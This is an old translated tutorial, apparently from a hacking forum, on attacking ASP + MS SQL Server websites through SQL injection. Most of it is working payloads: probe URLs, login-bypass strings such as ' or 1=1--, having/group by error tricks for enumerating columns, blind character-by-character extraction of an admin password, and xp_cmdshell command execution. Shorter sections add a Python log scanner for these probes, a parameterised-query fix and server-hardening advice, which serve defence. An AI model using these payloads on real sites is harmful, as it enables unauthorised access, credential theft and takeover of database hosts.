Writer: demonalex
Email: demonalex [at] dark2s.org
Note: this article deals with testing the common ASP + MS SQL Server back-end websites.
PS: I've written a lot of bad articles recently and found many errors. Please advise me a lot :)
Basic steps of SQL injection:
Find the SQL injection entry point (a URL parameter, an unfiltered character, etc.) -> carry out the injection -> penetration successful
==============================================================================================
----------------------------------------------------------------------------------------------
How to find the SQL injection entry point.
The common method is to append special characters or strings to a parameter, such as:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34'
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34;
and then watch whether the page still displays normally; this shows whether the parameter reaches SQL with these characters unfiltered. If adding a single quotation mark returns:
"Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''."
then there is something to "play" with. Alternatively, request:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 and 1=1
and
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 and 1=2
and check whether the page displays normally in each case (if the page is normal with 1=1 but not with 1=2, the site is SQL injectable).
Another method is to use an MS SQL Server specific feature directly to test whether the site is vulnerable, such as:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=(select @@version)
On a site like the one Xiao Shen tested, this returns:
"Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0
(Build 2195: Service Pack 4)' to a column of data type int."
That's it ......:)
----------------------------------------------------------------------------------------------
Having found the SQL injection hole, how do we penetrate the machine?
Penetration methods are endless, but I summarise three (for ASP + MS SQL Server only): bypassing the
authentication system, obtaining database information through injected queries, and controlling the host through SQL Server's extended stored procedures.
Bypassing the authentication system:
For details of how it works, refer to "SQL Injection Attack Techniques" written by isno. This is the simplest attack method.
The steps are transparent: first find the "input area" of the authentication form, then type the following into it:
--
'--
or
or 1=1--
' or 1=1--
or 'a'='a
' or 'a'='a
and so on.
Obtaining database information through injected queries:
This method is the most cumbersome (and the most interesting). The prerequisite for using it is a certain grounding in the SQL language.
First we need to get the table name and column names. Here I use the string "having 1=1--" to make the system throw a
database error that reveals the table name and a column name:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 having 1=1--
Then use group by to get the other column names:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 group by known_table.known_column, known_table.known_column2 having 1=1--
and keep going...
Method 2: brute force. This method is simple and applies to every database that supports SQL (such as Access and MySQL). For example:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 and 0<(select count(*) from tablename)
This statement follows the syntax of generic SQL. Look at the following part:
0<(select count(*) from tablename)
This expression is true when the number of records in tablename is greater than 0. If it is true, the "and" that joins it to
"http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34" also holds and the page returns normally. In this way you can
determine whether a table exists (unless the table exists but has no records).
The third way to get table names is:
Use the default built-in system tables of MS SQL Server to obtain the table names in the current database.
The system view information_schema.tables stores the names of the tables in the current database.
For more information, see:
http://demonalex.nease.net/SQL_injection/walkthrough.txt
in the SQL injection walkthrough, the two sections:
"6.0 How can I get some important data from the ODBC error message returned by the database?"
"6.1 How do I find the column names in the table?"
(Are there other ways to get table and column names? Please let us know.)
Experts usually detect the data types at this stage, but for simplicity I will not discuss that here;
see "SQL Injection Attack Techniques" for it.
Now let's assume we already know the table name and column name; the remaining problem is to find the values.
There may be many methods, but I prefer to use "and 1=" to judge:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 and 1=(select top N count(*) from tablename where len(columnname)>0)
In the above, "N" is the row number up to which to count, "tablename" is the table we found earlier, and "columnname" is the column we found earlier.
Through this logical test we can find the length of a given value in a row of a column of a table. Then it is time to detect
the content of that value (for example the password content):
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 and 1=(select top N count(*) from tablename where left(columnname, number of leading characters)='character or string')
For example:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34 and 1=(select top 1 count(*) from admin where left(password,5)='admin')
In this example we learn whether the first five characters of the password column in the first row of the table admin are "admin".
Of course this method is very flexible, so Xiao Shen does not intend to "record" it fully in this article; it is enough to present the main
"calling pattern" of this kind of penetration (in fact this penetration method is the essence of SQL injection techniques).
Controlling the host with SQL Server's extended stored procedures:
The principle is to use SQL Server's extended stored procedures to control the host.
The most commonly used extended stored procedure is xp_cmdshell:
First the attacker finds that the SQL statement terminator ";" is not filtered by the script, and then launches the attack on the
target host through a request like the following:
http://www.xxxx.com/Product/ViewProduct.asp?PC_ID=34;exec master..xp_cmdshell 'ping 127.0.0.1'
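As an added example (not from the original article) of the defender's side of the probes above, the following Python script scans constructed IIS-style log lines for the request patterns this article describes: a stray single quote, "and 1=1" / "and 1=2", "having 1=1--", "group by", "@@version", a count(*) subquery and a stacked ";exec ... xp_cmdshell". The rule list and the log lines are my own assumptions; the field layout assumed is the W3C order date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Heuristic rules (my assumption) for the probes described in the article.
RULES = [
    ("stray single quote", re.compile(r"'")),
    ("boolean probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("having/group by probe", re.compile(r"\b(having|group\s+by)\b", re.I)),
    ("version disclosure", re.compile(r"@@version", re.I)),
    ("count subquery", re.compile(r"select\s+(top\s+\d+\s+)?count\s*\(\s*\*\s*\)", re.I)),
    ("stacked xp_cmdshell", re.compile(r";\s*exec\b.*xp_cmdshell", re.I)),
]

# Constructed IIS W3C log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-05-01 10:00:01 10.0.0.5 GET /Product/ViewProduct.asp PC_ID=34 200
2004-05-01 10:00:02 10.0.0.5 GET /Product/ViewProduct.asp PC_ID=34%27 500
2004-05-01 10:00:03 10.0.0.5 GET /Product/ViewProduct.asp PC_ID=34+and+1=2 200
2004-05-01 10:00:04 10.0.0.5 GET /Product/ViewProduct.asp PC_ID=34+having+1=1-- 500
2004-05-01 10:00:05 10.0.0.5 GET /Product/ViewProduct.asp PC_ID=34;exec+master..xp_cmdshell+%27ping+127.0.0.1%27 500
""".splitlines()

def scan_request(uri):
    """Return the names of the rules that fire on one request's query string."""
    query = urlsplit(uri).query
    # Decode %xx and '+' and collapse whitespace so spacing tricks do not hide a pattern.
    decoded = " ".join(unquote_plus(query).split())
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(lines):
    """Return (client_ip, uri, hits) for every log line matching at least one rule."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem, query = fields[2], fields[4], fields[5]
        uri = stem if query == "-" else stem + "?" + query
        hits = scan_request(uri)
        if hits:
            findings.append((ip, uri, hits))
    return findings

if __name__ == "__main__":
    for ip, uri, hits in scan_log(SAMPLE_LOG):
        print(ip, uri, ", ".join(hits))
```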
----------------------------------------------------------------------------------------------
How to prevent and defend against SQL injection.
Here Xiao Shen summarises two approaches: manual defence and external defence.
Manual defence mainly means modifying the program by hand and modifying the script's runtime environment to remove the vulnerability. isno
uses the Replace function to rewrite the form of the variables taken in by the script:
input = Replace(input, "'", "''")
Other injection characters besides the single quote can be handled the same way. Modifying the script's runtime environment mainly means deleting the
extended stored procedures that attackers like to use, such as:
xp_cmdshell
xp_reg*
xp_servicecontrol
sp_OA*
xp_startmail
xp_sendmail
sp_makewebtask
and so on. In addition, it is best to have the database connection use a non-sa user as the database owner, so that an attacker who has found SQL
injection cannot use sp_addextendedproc to restore the extended stored procedures.
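As an added example (not code from the article or from isno), here is a Python port of the Replace-style fix next to a hardened version, using an in-memory sqlite3 table as a stand-in for the SQL Server product table. The point it shows: escaping quotes does nothing for a numeric parameter such as PC_ID, which is never wrapped in quotes in the query, so strict validation plus a bound parameter is what actually closes the hole. The table and its rows are constructed for the example.

```python
import re
import sqlite3

# Constructed in-memory table standing in for the ASP site's product table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Product (PC_ID INTEGER PRIMARY KEY, Name TEXT);
    INSERT INTO Product VALUES (34, 'Widget'), (35, 'Gadget');
""")

def escape_quotes(value):
    """The article's manual fix, Replace(input, "'", "''"), ported to Python."""
    return value.replace("'", "''")

def lookup_escaped_only(pc_id):
    """Query built by string concatenation, protected only by quote escaping.
    PC_ID is numeric, so the concatenated value is not quoted at all and the
    escaping changes nothing: 'and 1=2' still alters the WHERE clause."""
    sql = "SELECT Name FROM Product WHERE PC_ID = " + escape_quotes(pc_id)
    return [row[0] for row in conn.execute(sql)]

def lookup_hardened(pc_id):
    """Reject anything that is not a plain integer, then bind it as a
    parameter so the value can never be parsed as SQL."""
    if not re.fullmatch(r"\d{1,9}", pc_id):
        raise ValueError("PC_ID must be a positive integer")
    sql = "SELECT Name FROM Product WHERE PC_ID = ?"
    return [row[0] for row in conn.execute(sql, (int(pc_id),))]
```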
The external defence method is to work with other facilities (hardware/software) to filter the "root" of SQL injection, the POST content sent by the client.
Hardware and software work on the same principle: they decode the POST data all the way up to the application layer and use the
application-layer data to filter keywords and take the corresponding action. In hardware this kind of defence is mainly handed to
a filtering gateway and an IDS. However, not many people can afford such hardware devices, so we choose software as
our main "defence weapon". Among the latest software security products, I recommend eEye's SecureIIS in particular.
(I will write an introduction to it later :)